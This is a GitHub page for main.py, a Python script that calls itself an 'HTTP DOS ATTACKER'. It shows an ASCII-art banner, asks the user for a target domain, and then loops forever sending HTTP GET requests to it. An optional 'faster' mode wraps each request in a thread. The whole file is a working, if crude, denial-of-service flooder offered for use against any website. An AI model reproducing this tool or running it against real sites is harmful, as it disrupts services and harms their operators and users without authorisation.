-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmain.py
69 lines (69 loc) · 3.5 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
import json
import os
from time import sleep
import colorama
from colorama import Fore
from colorama import Back
import requests
from threading import Thread
colorama.init(
True
)
os.system("cls")
def send_request(url):
print(Fore.RED + Back.BLACK + "\n>> Sending a new connecting ...")
r = requests.get(url)
if r.status_code == 200:
print(Fore.GREEN + "\n>> Request send!")
else:
print(Fore.RED + "Cannot send, gotting this status code: " + str(r.status_code))
print(colorama.Fore.WHITE + colorama.Back.RED + """
((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
(((((((((((((((((((((((((((((((((((((( ( (((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((( ((((((((((((((((((((((((((((((
(((((((((((((((((((((((((( (((((((((((((((((((((((((
((((((((((((((((((((((( ((((((((((((/ ((((((((((((((((((((((
((((((((((((((((((((( ((((((( ((((((( ((((((((((((((((((((
(((((((((((((((((((( (((((((((((((((((((
((((((((((((((((( ((((((((((((((((
(((((((((((((((((( /((((((((, *((((((((* (((((((((((((((((
((((((((((((((((((( ((((( ((((( ((((((((((((((((((
((((((((((((((((((( ((((((((((((((((((
(((((((((((((((((( (((((((((((((((((
(((((((((((((((((, (((((((((((((((((
((((((((((((((((( ((((((((( ((((((((( ((((((((((((((((
((((((((((((((((( ((((( ((((( ((((((((((((((((
((((((((((((((((. ((((((((((((((((
(((((((((((((((( *(((((((((((((((
((((((((((((((((( ((((((((((((((((
((((((((((((((((((( (((((( (((((( ((((((((((((((((((
(((((((((((((((((((((((( ((((((((((((((((((((( (((((((((((((((((((((((
((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
\n""")
print(Fore.WHITE + Back.BLUE + "HTTP DOS ATTACKER\nMade by github.com/ghalbeyou !\n")
sleep(5)
os.system("cls")
with open('config.json', 'r') as fp:
CONIG = json.load(fp=fp)
ip = input(">> DOMAIN: \n")
sleep(2)
url = "http://" + ip
os.system("cls")
if CONIG["use_faster_method"] == True:
while True:
t = Thread(target=send_request, args=[url])
t.run()
else:
while True:
send_request(url=url)